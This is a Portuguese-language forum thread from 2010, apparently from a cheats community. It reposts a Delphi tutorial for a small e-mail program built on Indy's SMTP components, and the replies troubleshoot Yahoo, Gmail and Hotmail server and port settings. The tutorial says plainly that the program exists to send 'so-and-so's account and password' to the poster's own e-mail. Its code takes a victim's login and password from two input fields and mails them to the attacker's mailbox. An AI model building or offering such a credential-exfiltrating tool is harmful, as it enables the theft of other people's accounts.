DragonBoss 9 Postado 2 de Abril 2010 Compartilhar Postado 2 de Abril 2010 · Aew Galera, Antes de tudo, gostaria de dizer que nao fiz esse tutorial, e sim que peguei de outro forum, entao antes de alguem dizer "heyyy, nao foi vuxe kii feizzz issu ", ja to falando , nao foi eu mesmo ke fiz =P e os devidos creditos sao para o kaaus da Cheats Brasil, eu soh fiz pequenas alteraçoes. ( nem sei se pode fala o nome de outro forum , se nao puder, me avisem !) Entao Vamos la ( tutorial original ): É um programinha simples para enviar e-mails.Use sua imaginação e desenvolva algo pra você mesmo! O exemplo que fiz é simples assim: Vamos lá.! Deixe sua tela como a de cima /\ -Adicione 2 componetes label (Esta na paleta Standart) -Adicione 2 componentes edit(Patela Standart) -Adicione 1 componente button(Paleta Standart) -Adicione 1 componente IdSMTP(Paleta Indy Clientes) -Adicione 1 componente IdMessage(Paleta Indy Misc) Pronto! 50% já esta feito! Vamos colocar os codigos.. Dê um duplo clique no Button1(mude o nome se desejar) Adicione os seguintes códigos ( arrume eles até que fiquem igual o da imagem abaixo ) Cpodigos: IdSMTP1.AuthenticationType := atLogin; ~> Autentifica por SMTP. idSMTP1.Host := 'smtp.mail.yahoo.com.br' ; ~> Host da yahoo. idSMTP1.Port := 25; ~> Porta do host da yahoo. idSMTP1.Username := '[email protected]'; ~> e-mail da yahoo. idSMTP1.Password := 'SuaSenha'; ~> Senha do seu e-mail. idSMTP1.Connect(30000); ~> Conecta pelo seu e-mail e senha. IdMessage1.From.Address := '[email protected]'; ~> Envia Para: IdMessage1.Sender.Name := '[email protected]'; ~>Nome: IdMessage1.Sender.Address := '[email protected]'; ~> Seu e-mail. IdMessage1.Recipients.EMailAddresses := '[email protected]'; ~>Envia para: IdMessage1.Subject := edit1.Text + '''' + edit2.Text; ~> O corpo da mensagem é o que esta no edit1 + edit2. IdSMTP1.Send(IdMessage1); ~> Vai enviar por tudo que esta no IdMessage1. IdSMTP1.Disconnect; ~> Depois que faz tudo,desconecta do smtp. ~ OBS: Veja que em todos os campos de e-mail está apenas um. Vamos pensar assim: "Eu quero um programa que envia a conta e a senha do fulano pro meu e-mail". É por isso que está o mesmo email.O seu email vai enviar o que está no Edit1 + Edit2 para você mesmo.! ~ Eu aconselho usar e-mail da yahoo, porque eu ja tentei com outros e não deu certo. ~ É necessário se cadastrar para acessar o conteúdo. Entre ou Cadastre-se O tutorial do Kaaus é isso, mas como sempre lhes digo, nao copiem o codigo apenas, e sim leiam e entendam o que ele quer dizer e o que ira fazer, isso é um exemplo simples, mas com um pouco mais de imaginaçao, da pra fazer um programa de envio de emails bem mais moderno e interessante. O tuto nao eh meu, mas se kiserem agradecer nao ligo ta..kpoakspoks Flw Galera. Edit~ Informaçoes do Gmail, By : Bidoow idSMTP1.Host := 'smtp.gmail.com' ; ~> Host da GMAIL. idSMTP1.Port := 25; ~> Porta do host da GMAIL. Porta SMTP: 25 , Ou Caso não consiga enviar mensagens, experimente modificar a porta para 587 OBS: com o email do yahoo funciona de boa, com outros emails tem GRANDES chances de dar erro =P Flw ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
matheusguerra 3 Postado 2 de Abril 2010 Compartilhar Postado 2 de Abril 2010 · cara fico bom mais como eu mando pra hotmail ou gmail ?? ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
DragonBoss 9 Postado 2 de Abril 2010 Compartilhar Postado 2 de Abril 2010 · ae vc teria ke trokar o smtp pelo da hotmail ou gmail e tbm mudar a porta ( ae vc teria ke descobrir essas informaçoes ) e ver se da certo, com o do yahoo ake funciono de boa, depois vo testa com outro email. flw. abraços. ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
matheusguerra 3 Postado 2 de Abril 2010 Compartilhar Postado 2 de Abril 2010 · tipow IdMessage1.Sender.Address := 'SeuEmail@yahoo.com.bt'; num é só troca o yahoo por hotmail ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
DragonBoss 9 Postado 2 de Abril 2010 Compartilhar Postado 2 de Abril 2010 · hum, voce quer somente enviar para hotmail ou usar hotmail para enviar ? pq se for soh pra enviar pra hotmail, axo q funcionaria soh trokando o email, mas se vc for utilizar um email da hotmail para o envio, teria ke alterar alem do email, o smtp e a port do host, mas precisamente, estas areas : idSMTP1.Host := 'smtp.mail.yahoo.com.br' ; ~> Host da yahoo. idSMTP1.Port := 25; ~> Porta do host da yahoo. Entre outras informaçoes, Abraços. ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Surfistinha£ 22 Postado 2 de Abril 2010 Compartilhar Postado 2 de Abril 2010 · Muito bom se for pra mandar outro e-mail tipo de hotmail pra g-mail so trocar Otimo turtorial adorei muito obrigado por compartilhar vlw ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
matheusguerra 3 Postado 2 de Abril 2010 Compartilhar Postado 2 de Abril 2010 · hum, intendi agora vlw :D ^^ ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
bidoow 0 Postado 2 de Abril 2010 Compartilhar Postado 2 de Abril 2010 · GMAIL. idSMTP1.Host := 'smtp.gmail.com' ; ~> Host da GMAIL. idSMTP1.Port := 25; ~> Porta do host da GMAIL. Porta SMTP: 25 , Ou Caso não consiga enviar mensagens, experimente modificar a porta para 587 O Hotmail só funciona com HTTP.. não SMTP Fico massa o tuto, sepa tive imaginação da pra cria um legal:) ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
קђ๏єภเא 16 Postado 2 de Abril 2010 Compartilhar Postado 2 de Abril 2010 · Valeu cara me salvo eu tava precisando disso! ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
DragonBoss 9 Postado 2 de Abril 2010 Compartilhar Postado 2 de Abril 2010 · vlw a voces galera ^^ soh to tentando trazer ao wc o melhor conteudo :p flw, abraços. ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
bidoow 0 Postado 2 de Abril 2010 Compartilhar Postado 2 de Abril 2010 · aff manu com meu email da yahoo pego, mais do gmail não tá funcionando! qui merda:'/ ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
' Sky 8 Postado 29 de Abril 2010 Compartilhar Postado 29 de Abril 2010 · hi man tipo quero botar pra hotmaiol/live so mundo o smp ali né ? pra live ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
DragonBoss 9 Postado 29 de Abril 2010 Compartilhar Postado 29 de Abril 2010 · olha, tentei jah com hotmail e nao vai nem a pau, jah tentei varios smtp do hotmal e gmail.... soh do yahoo ke ta funfando ake --' se e conseguir qualker coisa aviso ake... flw galera ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
~OwneR~ 8 Postado 29 de Abril 2010 Compartilhar Postado 29 de Abril 2010 · O SMTP do Hotmail é smtp.live.com Eu tentei fazer aqui com hotmail, chega a conectar com o servidor porém o hotmail requer uma conexão SSL senão retorna um erro 5.7.0 bla bla bla. Deem um olhada É necessário se cadastrar para acessar o conteúdo. Entre ou Cadastre-se . Aí diz que deve instalar um suporte a SSL no Indy .-. ----Edit---- Eu vi aqui e no Delphi7 já tem isso... Associem o SSL ao SMTP ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
DragonBoss 9 Postado 29 de Abril 2010 Compartilhar Postado 29 de Abril 2010 · hum, to ligado owner, ahh , mas pra mim yahoo eh melhor mesmo =P mas se eu consegui faze funfa com outros emails eu aviso² flw, abraços... vlw ae owner ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
' Sky 8 Postado 29 de Abril 2010 Compartilhar Postado 29 de Abril 2010 · O SMTP do Hotmail é smtp.live.com Eu tentei fazer aqui com hotmail, chega a conectar com o servidor porém o hotmail requer uma conexão SSL senão retorna um erro 5.7.0 bla bla bla. Deem um olhada É necessário se cadastrar para acessar o conteúdo. Entre ou Cadastre-se . Aí diz que deve instalar um suporte a SSL no Indy .-. ----Edit---- Eu vi aqui e no Delphi7 já tem isso... Associem o SSL ao SMTP então é só substituir onde tá SMPT e colocar esse seguinte codigo SSL ? ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
~OwneR~ 8 Postado 29 de Abril 2010 Compartilhar Postado 29 de Abril 2010 · Dá uma olhadinha aí > É necessário se cadastrar para acessar o conteúdo. Entre ou Cadastre-se Quando eu chegar em casa eu testo o código .-. ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
mgbcrazy 0 Postado 2 de Maio 2010 Compartilhar Postado 2 de Maio 2010 · cara pequena má noticia pra mim tow fudido nao funfa veioo da um erro estranhao aki esqueci de ver ate o q ta escrito me da um helpp aeee ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
fr0g 0 Postado 28 de Maio 2010 Compartilhar Postado 28 de Maio 2010 · o gmail eu uso e funciona direitinho, só que o smtp do gmail eh: smpt.gmail.com e a porta eh 465 para uso da ssl ao enviar email é só olhar AQUI :cool: ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Posts Recomendados